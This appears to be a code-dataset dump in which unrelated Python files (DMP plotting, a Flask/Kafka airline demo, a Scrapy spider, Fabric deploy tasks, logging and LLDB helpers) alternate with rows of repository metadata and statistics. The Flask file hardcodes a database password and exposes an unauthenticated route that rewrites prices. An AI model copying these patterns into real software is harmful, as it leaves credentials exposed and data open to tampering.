discrete_dmp.imitate(np.array([t, y_d]))
y, dy, ddy = discrete_dmp.rollout()
init_points = np.array([discrete_dmp.y0, discrete_dmp.goal])
# print(discrete_dmp.generate_goal())
# print(discrete_dmp.generate_goal(f0=discrete_dmp.f_target[:,0]))
# check with standard discrete DMP when rescaling the goal
plt.subplot(1, 3, 1)
plt.title('Initial discrete DMP')
plt.scatter(init_points[:,0], init_points[:, 1], color='b')
plt.scatter(new_goal[:, 0], new_goal[:, 1], color='r')
plt.plot(y[0], y[1], 'b', label='original')
plt.subplot(1, 3, 2)
plt.title('Rescaled discrete DMP')
plt.scatter(init_points[:, 0], init_points[:, 1], color='b')
plt.scatter(new_goal[:, 0], new_goal[:, 1], color='r')
plt.plot(y[0], y[1], 'b', label='original')
for g in new_goal:
y, dy, ddy = discrete_dmp.rollout(new_goal=g)
plt.plot(y[0], y[1], 'g', label='scaled')
plt.legend(['original', 'scaled'])
# change goal with biologically-inspired DMP
new_goal = np.array([[0.8, -0.25],
[0.8, 0.25],
[0.4, 0.1],
[5., 0.15],
[1.2, -0.25],
[-0.8, 0.1],
[-0.8, -0.25],
[5., -0.25]])
bio_dmp = BioDiscreteDMP(num_dmps=2, num_basis=num_basis)
bio_dmp.imitate(np.array([t, y_d]))
y, dy, ddy = bio_dmp.rollout()
init_points = np.array([bio_dmp.y0, bio_dmp.goal])
plt.subplot(1, 3, 3)
plt.title('Biologically-inspired DMP')
plt.scatter(init_points[:, 0], init_points[:, 1], color='b')
plt.scatter(new_goal[:, 0], new_goal[:, 1], color='r')
plt.plot(y[0], y[1], 'b', label='original')
for g in new_goal:
y, dy, ddy = bio_dmp.rollout(new_goal=g)
plt.plot(y[0], y[1], 'g', label='scaled')
plt.legend(['original', 'scaled'])
plt.show()
# changing goal at the middle
y_list = []
for g in new_goal:
bio_dmp.reset()
y_traj = np.zeros((2, 100))
for t in range(100):
if t < 30:
y, dy, ddy = bio_dmp.step()
else:
y, dy, ddy = bio_dmp.step(new_goal=g)
y_traj[:, t] = y
y_list.append(y_traj)
for y in y_list:
plt.plot(y[0], y[1])
plt.scatter(bio_dmp.y0[0], bio_dmp.y0[1], color='b')
plt.scatter(new_goal[:, 0], new_goal[:, 1], color='r')
plt.title('change goal at the middle')
plt.show()
# changing goal at the middle but with a moving goal
g = np.hstack((np.arange(1.0, 2.0, 0.1).reshape(10, -1),
np.arange(0.0, 1.0, 0.1).reshape(10, -1)))
bio_dmp.reset()
y_traj = np.zeros((2, 100))
y_list = []
for t in range(100):
y, dy, ddy = bio_dmp.step(new_goal=g[int(t/10)])
y_traj[:, t] = y
if (t % 10) == 0:
y_list.append(y)
y_list = np.array(y_list)
plt.plot(y_traj[0], y_traj[1])
plt.scatter(bio_dmp.y0[0], bio_dmp.y0[1], color='b')
plt.scatter(g[:, 0], g[:, 1], color='r')
plt.scatter(y_list[:, 0], y_list[:, 1], color='g')
plt.title('moving goal')
plt.show()
| 29.130952 | 78 | 0.630772 | 859 | 4,894 | 3.466822 | 0.146682 | 0.066488 | 0.026864 | 0.024177 | 0.602418 | 0.499664 | 0.421088 | 0.384822 | 0.371726 | 0.283747 | 0 | 0.050308 | 0.171434 | 4,894 | 167 | 79 | 29.305389 | 0.684094 | 0.112178 | 0 | 0.419355 | 0 | 0 | 0.06571 | 0.004859 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.008065 | 0 | 0.008065 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a8fd55aaa3ed3b16b9a4ac6ecf440894a3b0fc20 | 7,186 | py | Python | skaffold-STABLE/webapp/hello.py | LennartFertig/BigData | e74761b16812fd034519c06897329ea9ba9968df | [
"Apache-2.0"
] | null | null | null | skaffold-STABLE/webapp/hello.py | LennartFertig/BigData | e74761b16812fd034519c06897329ea9ba9968df | [
"Apache-2.0"
] | null | null | null | skaffold-STABLE/webapp/hello.py | LennartFertig/BigData | e74761b16812fd034519c06897329ea9ba9968df | [
"Apache-2.0"
] | 1 | 2021-10-19T07:45:12.000Z | 2021-10-19T07:45:12.000Z | from flask import Flask, render_template, request, redirect, url_for, flash
import emoji
import socket
import psycopg2
from pymemcache.client.base import Client
from essential_generators import DocumentGenerator
from kafka import KafkaProducer
# Lennart, 26.8
# from flask_caching import Cache
client = Client('memcached-service')
app=Flask(__name__)
# Test Zugriff auf den Webserver
@app.route('/')
def Index():
return render_template('index.html')
# Test Cacheserver, Lennart, 26.08.
# Die Verbindung zur Datenbank steht bereits.
@app.route('/deployment')
def depl():
## Datenabfrage aus Cacheserver
cache_result = client.get('flights')
## Wenn keine Daten im Cache, ziehe aus der Datenbank
if cache_result is None: #flights nicht verfügbar
con = psycopg2.connect("host=postgres port=5432 dbname=kranichairline_db user=postgres password=postgres")
cur = con.cursor()
cur.execute("select * from flights")
data = cur.fetchall()
cur.close()
client.set('flights', data)
return render_template('index3.html', data=data)
else:
#### TODO: Ausgabeformat ist noch nicht schön
# Wenn verfügbar, nehme die Daten aus dem Cache
data=cache_result
return render_template('index3.html', data=data)
# except Exception as e:
# data=e
# return emoji.emojize('Cacheserver ist :poop:', use_aliases=True)
# Funktion zum Senden der Daten an das Kafka-Topic, die bei Klick des Buttons aufgerufen wird
@app.route('/kafka')
def your_flask_funtion():
# Senden Bei Klick
producer = KafkaProducer(bootstrap_servers='my-cluster-kafka-bootstrap:9092')
next_click = "KLICK GEHT"
# print(f"Sending message: {next_click}")
future = producer.send("1337datascience", next_click.encode())
result = future.get(timeout=5)
# print(f"Result: {result}")
return emoji.emojize(':thumbsup:', use_aliases=True)
###### Entwurf
### Alternativ könnte man eine seite bauen, die solange der user sich darauf befindet nachrichten in das Topic sendet
# und so das Interesse der Nutzer abschätzen und dementsprechen die Preise erhöhen
@app.route('/zeitbasiert')
def timed_producer():
producer = KafkaProducer(bootstrap_servers='my-cluster-kafka-bootstrap:9092')
while True:
next_msg = "nochda"
print(f"Sending message: {next_msg}")
future = producer.send("1337datascience", next_msg.encode())
result = future.get(timeout=10)
print(f"Result: {result}")
time.sleep(5)
############### Ab hier sind alles Testseiten ################
# Test des Datenbankzugriffs
@app.route('/cachetest')
def test():
## Datenabfrage aus Cacheserver
cache_result = client.get('flights')
## Wenn keine Daten im Cache, ziehe aus der Datenbank
if cache_result is None: #flights nicht verfügbar
con = psycopg2.connect("host=postgres port=5432 dbname=kranichairline_db user=postgres password=postgres")
cur = con.cursor()
cur.execute("select * from flights")
data = cur.fetchall()
cur.close()
client.set('flights', data)
return emoji.emojize('Daten waren nicht im Cacheserver :thumbsdown:', use_aliases=True)
else:
# Wenn verfügbar, nehme die Daten aus dem Cache
data=cache_result
return emoji.emojize('Daten waren im Cacheserver :thumbsup:', use_aliases=True)
# except Exception as e:
# data=e
# return emoji.emojize('Cacheserver ist :poop:', use_aliases=True)
# Test des Datenbankzugriffs
@app.route('/dbtest')
def dbtest():
con = psycopg2.connect("host=postgres port=5432 dbname=kranichairline_db user=postgres password=postgres")
cur = con.cursor()
cur.execute("select * from flights")
data = cur.fetchall()
cur.close()
return render_template('index3.html', data=data)
# Test ob der service mit DNS erreichbar ist - aktuelle IP einfügen
# UPDATE 24.08.
# Fehler bei der DNS-Erreichbarkeit lag an "k delete --all --all-namespaces", was auch den DNS-Pod löscht
@app.route('/servicetest')
def servicetest():
try:
con = psycopg2.connect("host=10.101.162.210 port=5432 dbname=kranichairline_db user=postgres password=postgres")
print('+=========================+')
print('| CONNECTED TO DATABASE |')
print('+=========================+')
# cursor = conn.cursor()
# print("test")
# print(cursor.execute("SELECT * FROM flights"))
cur = con.cursor()
cur.execute("select * from flights")
data = cur.fetchall()
cur.close()
return render_template('index3.html', data=data)
except Exception as e:
data=e
return emoji.emojize('Datenbank :poop:', use_aliases=True)
# Test ob der Postgres-Pod mit IP erreichbar ist, aktuelle IP einfügen
@app.route('/podtest')
def podtest():
try:
con = psycopg2.connect("host=172.17.0.5 port=5432 dbname=kranichairline_db user=postgres password=postgres")
print('+=========================+')
print('| CONNECTED TO DATABASE |')
print('+=========================+')
# cursor = conn.cursor()
# print("test")
# print(cursor.execute("SELECT * FROM flights"))
cur = con.cursor()
cur.execute("select * from flights")
data = cur.fetchall()
cur.close()
return render_template('index3.html', data=data)
except Exception as e:
data=e
return emoji.emojize('Datenbank :poop:', use_aliases=True)
# test ob sich die preise ändern lassen
@app.route('/changedb')
def changetest():
try:
con = psycopg2.connect("host=postgres port=5432 dbname=kranichairline_db user=postgres password=postgres")
cur = con.cursor()
cur.execute("UPDATE flights SET price= price + (price * 10 / 100) ")
cur.execute("select * from flights")
data = cur.fetchall()
cur.close()
return render_template('index3.html', data=data)
except Exception as e:
data=e
return emoji.emojize('Datenbank-Schreiben :poop:', use_aliases=True)
@app.route('/kafkaread')
# Test ob sich Messages lesen lassen
def kafkaread():
from kafka import KafkaConsumer
# The bootstrap server to connect to
bootstrap = 'my-cluster-kafka-kafka-bootstrap:9092'
# Create a comsumer instance
# cf.
print('Starting KafkaConsumer')
consumer = KafkaConsumer('1337datascience', # <-- topics
bootstrap_servers=bootstrap)
# Print out all received messages
data=[]
for msg in consumer:
data.append(msg)
return render_template('index3.html', data=data)
@app.route('/kafkaread2')
def kafkaread2():
from kafka import KafkaConsumer
# The bootstrap server to connect to
bootstrap = 'my-cluster-kafka-kafka-bootstrap:9092'
# Create a comsumer instance
# cf.
print('Starting KafkaConsumer')
consumer = KafkaConsumer('1337datascience', # <-- topics
bootstrap_servers=bootstrap)
# Print out all received messages
data=[]
for msg in consumer:
data.append(msg)
return data
| 34.883495 | 120 | 0.655998 | 864 | 7,186 | 5.399306 | 0.271991 | 0.018864 | 0.034298 | 0.041158 | 0.67717 | 0.591211 | 0.591211 | 0.577492 | 0.577492 | 0.550054 | 0 | 0.019514 | 0.215558 | 7,186 | 205 | 121 | 35.053659 | 0.808054 | 0.263707 | 0 | 0.615385 | 0 | 0.015385 | 0.290198 | 0.074716 | 0 | 0 | 0 | 0.004878 | 0 | 1 | 0.084615 | false | 0.046154 | 0.069231 | 0.007692 | 0.269231 | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a8ff50e25ec705d70c94ffe8982cb388ca277e90 | 1,644 | py | Python | crawling_project/news/stock/stock/spiders/spider.py | GS-Jo/Stock_data_Crawling_NLP | 187aaf8ad50d859aed0e905ebf632e57c5cc90df | [
"MIT"
] | null | null | null | crawling_project/news/stock/stock/spiders/spider.py | GS-Jo/Stock_data_Crawling_NLP | 187aaf8ad50d859aed0e905ebf632e57c5cc90df | [
"MIT"
] | null | null | null | crawling_project/news/stock/stock/spiders/spider.py | GS-Jo/Stock_data_Crawling_NLP | 187aaf8ad50d859aed0e905ebf632e57c5cc90df | [
"MIT"
] | null | null | null | import scrapy
import re
import pandas as pd
from stock.items import StockItem
class StockSpider(scrapy.Spider):
name = "Stock"
def start_requests(self):
codes = pd.read_csv("/home/ubuntu/crawling_project/news/stock_code.csv")["ISU_SRT_CD"].tolist()
urls = [f"https://finance.naver.com/item/news_news.nhn?code={code}&page=&sm=title_entity_id.basic" for code in codes]
for url in urls:
yield scrapy.Request(url, callback=self.parse)
def parse(self, response):
page_links = response.xpath('/html/body/div/table[2]/tr/td/a/@href').extract()
last_page = re.findall('page=([0-9]{1,4})', page_links[-1])[0]
stock_url = str(response.url)
for page in range(1,int(last_page)+1):
url = stock_url[:-25] + str(page) + stock_url[-25:]
yield scrapy.Request(url, callback=self.parse_content1)
def parse_content1(self, response):
links = response.xpath('/html/body/div/table[1]/tbody/tr/td[1]/a/@href').extract()
for link in links:
yield scrapy.Request("https://finance.naver.com/" + link, callback=self.parse_content2)
def parse_content2(self, response):
item = StockItem()
item["title"] = response.xpath('//*[@id="content"]/div[2]/table/tbody/tr[1]/th/strong/text()').extract()
item["news"] = response.xpath('//*[@id="content"]/div[2]/table/tbody/tr[2]/th/span/text()').extract()
item["date"] = response.xpath('//*[@id="content"]/div[2]/table/tbody/tr[2]/th/span/span/text()').extract()
item["news_link"] = response.url
yield item
| 46.971429 | 125 | 0.621655 | 233 | 1,644 | 4.296137 | 0.364807 | 0.064935 | 0.053946 | 0.065934 | 0.271728 | 0.271728 | 0.271728 | 0.127872 | 0.127872 | 0.08991 | 0 | 0.018968 | 0.198297 | 1,644 | 34 | 126 | 48.352941 | 0.740516 | 0 | 0 | 0 | 0 | 0.172414 | 0.291971 | 0.190389 | 0 | 0 | 0 | 0 | 0 | 1 | 0.137931 | false | 0 | 0.137931 | 0 | 0.344828 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d10b3ddebcaae291c1529bf78dd66e70b434c980 | 1,142 | py | Python | day23/day23.py | Strandtasche/go-experiments | 650b3e49439792a3e4e491436676197b720726b4 | [
"MIT"
] | null | null | null | day23/day23.py | Strandtasche/go-experiments | 650b3e49439792a3e4e491436676197b720726b4 | [
"MIT"
] | null | null | null | day23/day23.py | Strandtasche/go-experiments | 650b3e49439792a3e4e491436676197b720726b4 | [
"MIT"
] | null | null | null | from typing import List
import logging
# inpt = "871369452"
inpt = "389125467"
inpt_int = [int(i) for i in inpt] + [i for i in range(10, int(1e6) + 1)]
def iterate(circle: List[int], current: int):
# print(f"cups: {circle}")
# print(f"current: {current}")
current_loc = circle.index(current)
followers_loc = [(current_loc + i) % len(circle) for i in range(1,4)]
followers = [circle[i] for i in followers_loc]
for f in sorted(followers_loc, reverse=True):
del circle[f]
target = current - 1
while target not in circle:
target = (target - 1) % (len(circle)+4)
target_loc = circle.index(target)
circle[target_loc+1:target_loc+1] = followers
# print(f"followers: {followers}")
# print(f"target: {target}")
return circle, circle[(circle.index(current) + 1) % len(circle)]
pivot = inpt_int[0]
for i in range(int(1e7)):
# print("-------------------")
# print(f"move {i + 1}")
inpt_int, pivot = iterate(inpt_int, pivot)
if i % 1000 == 0:
print("current state: " + str(i))
index_1 = inpt_int.index(1)
print(inpt_int[index_1 + 1] * inpt_int[index_1 + 2])
| 31.722222 | 73 | 0.619089 | 172 | 1,142 | 4.005814 | 0.261628 | 0.071118 | 0.043541 | 0.030479 | 0.040639 | 0 | 0 | 0 | 0 | 0 | 0 | 0.051054 | 0.211033 | 1,142 | 35 | 74 | 32.628571 | 0.713652 | 0.161121 | 0 | 0 | 0 | 0 | 0.02529 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043478 | false | 0 | 0.086957 | 0 | 0.173913 | 0.086957 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d10ed065807744c36942dc81208ae7f3ce88e544 | 3,225 | py | Python | src/main.py | myuanz/fastest-csv-parser-generator | 05a804be9242132e42c0957000b9ea40b6e3143b | [
"BSD-2-Clause"
] | null | null | null | src/main.py | myuanz/fastest-csv-parser-generator | 05a804be9242132e42c0957000b9ea40b6e3143b | [
"BSD-2-Clause"
] | null | null | null | src/main.py | myuanz/fastest-csv-parser-generator | 05a804be9242132e42c0957000b9ea40b6e3143b | [
"BSD-2-Clause"
] | null | null | null | from csv_types import *
class CSVRowDef:
def __init__(self, row_items: list[CSVItemType], sep=',', ignore_blank=False, current_col_name='current_col') -> None:
assert len(sep) == 1, 'only use 1-length sep'
self.sep = sep
self.row_items = row_items
self.ignore_blank = ignore_blank
self.current_col_name = current_col_name
@staticmethod
def _generate_switch(switch_from: str, case_contents: dict[list[str], list[str]], defalut_content: str = ''):
cases = ''
for k, v in case_contents.items():
cases += f"case {k}: \n{v}\nbreak;\n"
default = ''
if defalut_content:
default = f'defalue: \n{defalut_content}\nbreak;'
return '''switch (%(switch_from)s) {
%(cases)s
%(default)s
}
''' % {'switch_from': switch_from, 'cases': cases, 'default': default}
def generate(self):
_enums = [i.get_enum_name() for i in self.row_items]
enums = '''enum col_item {\n %s\n}\n''' % (', '.join(_enums)) + ';'
open_file = f'''
boost::iostreams::mapped_file mmap(file_name, boost::iostreams::mapped_file::readonly);
auto f = mmap.const_data();
auto l = f + mmap.size();
'''
declarations =(
"\n".join([i.get_declaration() for i in self.row_items]) +
'\n' +
f'int {self.current_col_name} = 0;\n'
)
switch_next_item_contents = []
for i, e in zip(self.row_items, _enums[1:]):
switch_next_item_contents.append(
i.switch_next_item() + '\n' + f'{self.current_col_name} = {e};'
)
switch_next_item_switch = self._generate_switch(
self.current_col_name,
dict([(e, c) for e, c in zip(_enums[:-1], switch_next_item_contents)])
)
on_line_end = "\n".join([i.line_end() for i in self.row_items])
match_item_contents = [i.match_item(self.current_col_name) for i in self.row_items]
match_item_contents_switch = self._generate_switch(
self.current_col_name,
dict([(e, m) for e, m in zip(_enums, match_item_contents)])
)
main_loop = '''
%(open_file)s
%(declarations)s
while (f && f != l) {
switch (*f) {
case %(sep)d: // sep is [%(sep_char)s]
%(switch_next_item_switch)s
case '\\n':
%(last_switch_next)s
%(on_line_end)s
default:
%(match_item_contents_switch)s
break;
f++;
}
}
''' % {
'sep': ord(self.sep), 'sep_char': self.sep,
'switch_next_item_switch': switch_next_item_switch,
'last_switch_next': self.row_items[-1].switch_next_item(),
'on_line_end': on_line_end + f'{self.current_col_name} = {_enums[0]};',
'match_item_contents_switch': match_item_contents_switch,
'open_file': open_file,
'declarations': declarations
}
codes = '''
#include <cstdint>
#include <boost/iostreams/device/mapped_file.hpp>
%(enums)s
void parser(char* file_name) {
%(main_loop)s
}
''' % {'enums': enums, 'main_loop': main_loop}
return codes | 30.714286 | 122 | 0.571163 | 416 | 3,225 | 4.110577 | 0.233173 | 0.064327 | 0.073684 | 0.073684 | 0.204678 | 0.154386 | 0.111111 | 0.095906 | 0.095906 | 0.054971 | 0 | 0.003034 | 0.284651 | 3,225 | 105 | 123 | 30.714286 | 0.738188 | 0 | 0 | 0.024096 | 0 | 0 | 0.33819 | 0.096714 | 0 | 0 | 0 | 0 | 0.012048 | 1 | 0.036145 | false | 0 | 0.012048 | 0 | 0.084337 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d10f0b3585d9401cf911c5fd65e366242490092d | 5,169 | py | Python | fapistrano/deploy.py | liwushuo/fapistrano | 2a31aad01a04d7ea9108dc6f95aee9a53290459f | [
"MIT"
] | 18 | 2016-03-25T09:40:20.000Z | 2022-02-23T02:09:50.000Z | fapistrano/deploy.py | liwushuo/fapistrano | 2a31aad01a04d7ea9108dc6f95aee9a53290459f | [
"MIT"
] | null | null | null | fapistrano/deploy.py | liwushuo/fapistrano | 2a31aad01a04d7ea9108dc6f95aee9a53290459f | [
"MIT"
] | 3 | 2016-03-22T07:41:15.000Z | 2021-02-25T04:27:53.000Z | # -*- coding: utf-8 -*-
from fabric.api import (
runs_once, env, cd,
task, abort, show, prefix,
)
from fabric.contrib.files import exists, append
from fabric.context_managers import shell_env
from .utils import green_alert, run_function, run
from .configuration import with_configs
from .directory import (
get_current_release, get_previous_release,
get_linked_files, get_linked_file_dirs,
get_linked_dirs, get_linked_dir_parents,
get_outdated_releases,
)
from . import signal
@task
@with_configs
def restart():
signal.emit('deploy.restarting')
signal.emit('deploy.restarted')
@task
@with_configs
def release():
green_alert('Starting')
signal.emit('deploy.starting')
run_function(_start_deploy)
green_alert('Started')
signal.emit('deploy.started')
green_alert('Updating')
signal.emit('deploy.updating')
green_alert('Updated')
signal.emit('deploy.updated')
green_alert('Publishing')
signal.emit('deploy.publishing')
run_function(_symlink_current)
green_alert('Published')
signal.emit('deploy.published')
green_alert('Finishing')
signal.emit('deploy.finishing')
run_function(_cleanup)
green_alert('Finished')
signal.emit('deploy.finished')
@task
@with_configs
def resetup_repo():
with cd('%(current_path)s' % env):
signal.emit('git.building')
signal.emit('git.built')
@task
@with_configs
def rollback():
green_alert('Starting')
signal.emit('deploy.starting')
env.rollback_from = get_current_release()
env.rollback_to = get_previous_release()
env.release_path = '%(releases_path)s/%(rollback_to)s' % env
run_function(_check_rollback_to)
green_alert('Started')
signal.emit('deploy.started')
green_alert('Reverting')
signal.emit('deploy.reverting')
green_alert('Reverted')
signal.emit('deploy.reverted')
green_alert('Publishing')
signal.emit('deploy.publishing')
run_function(_symlink_current)
green_alert('Published')
signal.emit('deploy.published')
green_alert('Finishing rollback')
signal.emit('deploy.finishing_rollback')
run_function(_cleanup_rollback)
green_alert('Finished')
signal.emit('deploy.finished')
@task
@with_configs
def once():
green_alert('Running')
with cd(env.current_path), shell_env(**env.environment), show('output'):
run_function(_run_command)
green_alert('Ran')
@task
@with_configs
def shell():
with cd(env.current_path), shell_env(**env.environment), show('output'):
run_function(_run_shell)
def _run_command():
if env.run_command:
run(env.run_command)
def _run_shell():
if exists('venv/bin/activate'):
with prefix('source venv/bin/activate'):
if exists('manage.py'):
run('python manage.py shell')
return
elif exists('venv/bin/ipython'):
run('venv/bin/ipython')
return
elif exists('venv/bin/python'):
run('venv/bin/python')
return
else:
abort('Sorry, currently only support Python shell.')
def _start_deploy():
_check()
_write_env()
_symlink_shared_files()
def _write_env():
if not env.environment:
return
for env_key, env_value in env.environment.items():
env.env_line = 'export %s="%s"' % (env_key, env_value)
run("echo '%(env_line)s' >> $(echo '%(environment_file)s')" % env)
if not exists(env.environment_file):
run('touch %(environment_file)s' % env)
def _check():
run('mkdir -p %(path)s/{releases,shared/log}' % env)
if env.shared_writable:
run('chmod -R g+w %(shared_path)s' % env)
run('mkdir -p %(release_path)s' % env)
for linked_file_dir in get_linked_file_dirs():
dir = '%(release_path)s/' % env
dir += linked_file_dir
run('mkdir -p %s' % dir)
for linked_dir_parent in get_linked_dir_parents():
dir = '%(release_path)s/' % env
dir += linked_dir_parent
run('mkdir -p %s' % dir)
def _symlink_shared_files():
for linked_file in get_linked_files():
env.linked_file = linked_file
if exists('%(release_path)s/%(linked_file)s' % env):
run('rm %(release_path)s/%(linked_file)s' % env)
run('ln -nfs %(shared_path)s/%(linked_file)s %(release_path)s/%(linked_file)s' % env)
for linked_dir in get_linked_dirs():
env.linked_dir = linked_dir
if exists('%(release_path)s/%(linked_dir)s' % env):
run('rm -rf %(release_path)s/%(linked_dir)s' % env)
run('ln -nfs %(shared_path)s/%(linked_dir)s %(release_path)s/%(linked_dir)s' % env)
def _symlink_current():
run('ln -nfs %(release_path)s %(current_path)s' % env)
def _check_rollback_to():
if not env.release_path:
abort('No release to rollback')
def _cleanup_rollback():
run('rm -rf %(releases_path)s/%(rollback_from)s' % env)
def _cleanup():
with cd(env.releases_path):
outdated_releases = get_outdated_releases()
if outdated_releases:
run('rm -rf %s' % ' '.join(outdated_releases))
| 26.921875 | 93 | 0.653898 | 677 | 5,169 | 4.728213 | 0.177253 | 0.06248 | 0.089972 | 0.033739 | 0.332396 | 0.307092 | 0.302093 | 0.243049 | 0.211809 | 0.162449 | 0 | 0.000244 | 0.207971 | 5,169 | 191 | 94 | 27.062827 | 0.781632 | 0.004063 | 0 | 0.293333 | 0 | 0 | 0.259425 | 0.076953 | 0 | 0 | 0 | 0 | 0 | 1 | 0.106667 | false | 0 | 0.046667 | 0 | 0.18 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d11235940d45fbdbf83f4f7d5897d21befb35f6f | 1,553 | py | Python | ampel/log/handlers/RecordBufferingHandler.py | mafn/Ampel-core | 744acbf36f0a2ceae7230ceab1350236c1501b57 | [
"BSD-3-Clause"
] | null | null | null | ampel/log/handlers/RecordBufferingHandler.py | mafn/Ampel-core | 744acbf36f0a2ceae7230ceab1350236c1501b57 | [
"BSD-3-Clause"
] | null | null | null | ampel/log/handlers/RecordBufferingHandler.py | mafn/Ampel-core | 744acbf36f0a2ceae7230ceab1350236c1501b57 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# File: Ampel-core/ampel/logging/handlers/RecordBufferingHandler.py
# License: BSD-3-Clause
# Author: valery brinnel <firstname.lastname@gmail.com>
# Date: 25.09.2018
# Last Modified Date: 09.05.2020
# Last Modified By: valery brinnel <firstname.lastname@gmail.com>
from typing import Union
from logging import LogRecord, WARNING
from ampel.log.LightLogRecord import LightLogRecord
class RecordBufferingHandler:
"""
MemoryHandler-like class that can grown infinitely.
The standard memory handler provided by logging (BufferingHandler) makes use of a value called 'capacity',
which once reached, triggers the flush() method when new log records are emitted.
Since we trust ourselves to do things right (to never let the buffer grow indefinitely),
we renounce to use such security measure.
Known subclasses: DefaultRecordBufferingHandler, ChanRecordBufHandler, EnclosedChanRecordBufHandler
"""
__slots__ = 'buffer', 'level', 'has_error', 'warn_lvl'
def __init__(self, level: int) -> None:
self.buffer: list[LogRecord | LightLogRecord] = []
self.level = level
self.has_error = False
self.warn_lvl = WARNING
def flush(self) -> None:
""" Flush just means erase existing log records """
self.buffer = []
self.has_error = False
def handle(self, record: LogRecord | LightLogRecord) -> None:
if record.levelno >= self.level:
self.buffer.append(record)
if record.levelno > self.warn_lvl:
self.has_error = True
| 33.76087 | 107 | 0.721185 | 196 | 1,553 | 5.637755 | 0.602041 | 0.028959 | 0.032579 | 0.054299 | 0.068778 | 0.068778 | 0 | 0 | 0 | 0 | 0 | 0.014184 | 0.182872 | 1,553 | 45 | 108 | 34.511111 | 0.85658 | 0.562138 | 0 | 0.111111 | 0 | 0 | 0.042945 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.166667 | 0 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d112e2b6931dcd67c1b4fc198e4cafd8b1763528 | 1,059 | py | Python | res/dbg_vis.py | MrShiposha/mcrr-tree | fb7f1196fcfe48e10feafb116e947c938414f1a8 | [
"MIT"
] | null | null | null | res/dbg_vis.py | MrShiposha/mcrr-tree | fb7f1196fcfe48e10feafb116e947c938414f1a8 | [
"MIT"
] | 1 | 2020-10-04T03:05:48.000Z | 2020-10-04T03:05:48.000Z | res/dbg_vis.py | MrShiposha/lr-tree | fb7f1196fcfe48e10feafb116e947c938414f1a8 | [
"MIT"
] | null | null | null | import re
import lldb
def print_rust_str(debugger, command, result, internal_dict):
mem_threshold = 16384
var = command
ci = debugger.GetCommandInterpreter()
res = lldb.SBCommandReturnObject()
ci.HandleCommand("po {}.vec.len".format(var), res)
if not res.Succeeded():
result.SetError("dbg-vis {}".format(res.GetError()))
return
read_len = int(res.GetOutput())
if read_len > mem_threshold:
result.SetError("Unable to read {} bytes (threshold = {})".format(
read_len,
mem_threshold
))
return
ci.HandleCommand(
"me read -s1 -fa -c{} {}.vec.buf.ptr.pointer --force".format(
read_len,
var
),
res
)
if not res.Succeeded():
result.SetError("dbg-vis {}".format(res.GetError()))
return
output = res.GetOutput()
hex_regex = r'0x(\d|[A-Fa-f])+'
begin_regex = r'(^|\n){hex}: '.format(hex = hex_regex)
output = re.sub(begin_regex, '', output)
print(output, file=result)
| 24.068182 | 74 | 0.580737 | 126 | 1,059 | 4.769841 | 0.468254 | 0.046589 | 0.026622 | 0.036606 | 0.219634 | 0.219634 | 0.219634 | 0.219634 | 0.219634 | 0.219634 | 0 | 0.009091 | 0.272899 | 1,059 | 43 | 75 | 24.627907 | 0.771429 | 0 | 0 | 0.272727 | 0 | 0 | 0.144476 | 0.020774 | 0 | 0 | 0 | 0 | 0 | 1 | 0.030303 | false | 0 | 0.060606 | 0 | 0.181818 | 0.060606 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d113b020e79c04b4a005e8fbda9c59f7bbf8c0b1 | 1,473 | py | Python | setup.py | pygfx/pyshader | 804f2a63221b40434ebcbeb4a01eeebe0d361a90 | [
"BSD-2-Clause"
